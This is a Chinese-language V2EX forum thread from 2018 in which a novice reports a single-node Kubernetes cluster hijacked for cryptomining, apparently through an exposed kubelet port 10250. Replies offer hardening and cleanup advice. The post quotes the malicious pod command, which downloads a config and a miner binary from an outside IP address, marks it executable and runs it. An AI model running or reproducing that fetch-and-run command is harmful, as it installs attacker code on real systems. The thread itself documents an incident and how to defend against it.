k8s 被人拿去挖矿了

2018-08-02 18:36:54 +08:00
 shisang

在腾讯云学生机上自己折腾 k8s,并把 blog 部署在上边,结果两天上去怎么多那么多 pod。

top

kubectl get pods

ps aux | grep k.conf

查看 /tmp/docker, 没有了估计是屁股被擦干净了。

订阅轻重一个 pod

Command:
      sh
      -c
      curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json

找到了一篇一样遭遇的文章http://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html 按照作者所说应该是 10250 端口暴露到外网了。

netstat -lnpt | grep 10250 果不其然。

先杀死挖矿 pods,

kubectl get pods | grep y1ee4 | awk '{print $1}' | xargs kubectl delete --grace-period=0 --force pods

kubectl get pods

有重新创建了,日了

kubectl get rc 然后 delete rc,赶紧查看是不是哪里配置写错了。

新手,大神路过指导一二。

6488 次点击
所在节点    问与答
24 条回复
shisang
2018-08-02 18:46:59 +08:00
消灭零回复
des
2018-08-02 18:52:32 +08:00
重装最简单了
shisang
2018-08-02 18:53:14 +08:00
@des 要不要那么暴力
wtks1
2018-08-02 18:53:46 +08:00
重装是最暴力但最有效的办法
murmur
2018-08-02 19:02:34 +08:00
@shisang linux 没杀软 没那么多 windows 的花式检查工具 真的只能重装
murmur
2018-08-02 19:02:53 +08:00
别人甚至还可以替换掉你的常用命令
artandlol
2018-08-02 19:02:56 +08:00
@wtks1 只要不是用 root 用户登 docker 就没必要重装
artandlol
2018-08-02 19:11:52 +08:00
启 rbacc 客户端启用 token docker 用户不应该是 root
qfdk
2018-08-02 19:12:02 +08:00
docker 开了 remote api 了吧 我也中了 都是 docker 中运行 然后从容器里跑出来的 最后让我消灭了…… 本来是开了 api 做测试的 两天就被挖坑了
artandlol
2018-08-02 19:15:29 +08:00
然后 kubectl -o 出 yamll 然后 delete 看你是用 root 跑,最好还是回滚到之前的
abmin521
2018-08-02 20:02:25 +08:00
刚好研究过
关闭 kubelet 的匿名访问 双向 tls 就行了
kubeadm 就没有这个 bug
有空准备扫一波
cqxxxxxxx
2018-08-02 20:58:50 +08:00
lz 是一台机器 minikube 搭的 k8s?还是好几台机器搭的集群?
DesignerSkyline
2018-08-02 21:20:12 +08:00
重装吧,二进制已经被污染了
shisang
2018-08-02 22:33:18 +08:00
@abmin521 之前在 vultr 是 kubeadm 装过,运行挺好,就是国内装不上,用 privoxy 代理也不行。但是 vultr 坑爹了,重启后 ip ping 不通,要手动修改网络配置。要手动在网页 console 输入密码十几次每一次对的,最后客服说可以通过 sysroot 修改密码,按照文档操作后直接 unknown user,弃坑~!
shisang
2018-08-02 22:34:35 +08:00
@cqxxxxxxx 1cpu 2G memory 的鹅厂学生机,源码安装的单节点~~~~~逃
shisang
2018-08-02 22:41:49 +08:00
@qfdk 没有该 docker,是 k8s 污染进来的
mritd
2018-08-03 00:05:07 +08:00
你多半是看了那个 无良教程 apiserver 监听 :8080 了吧
E1n
2018-08-03 01:19:47 +08:00
单机能学到什么东西,褥 gcp 玩玩集群吧
580a388da131
2018-08-03 01:27:55 +08:00
不是有安全组吗?你开了所有端口?
0312birdzhang
2018-08-03 08:09:08 +08:00
直接删 pod 要是能删掉的话 deployment、rc、daemonset 是干嘛的😷

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/476377

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX